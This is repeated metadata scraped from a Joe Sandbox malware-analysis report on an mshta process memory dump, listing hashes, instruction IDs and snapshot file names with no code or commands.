                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
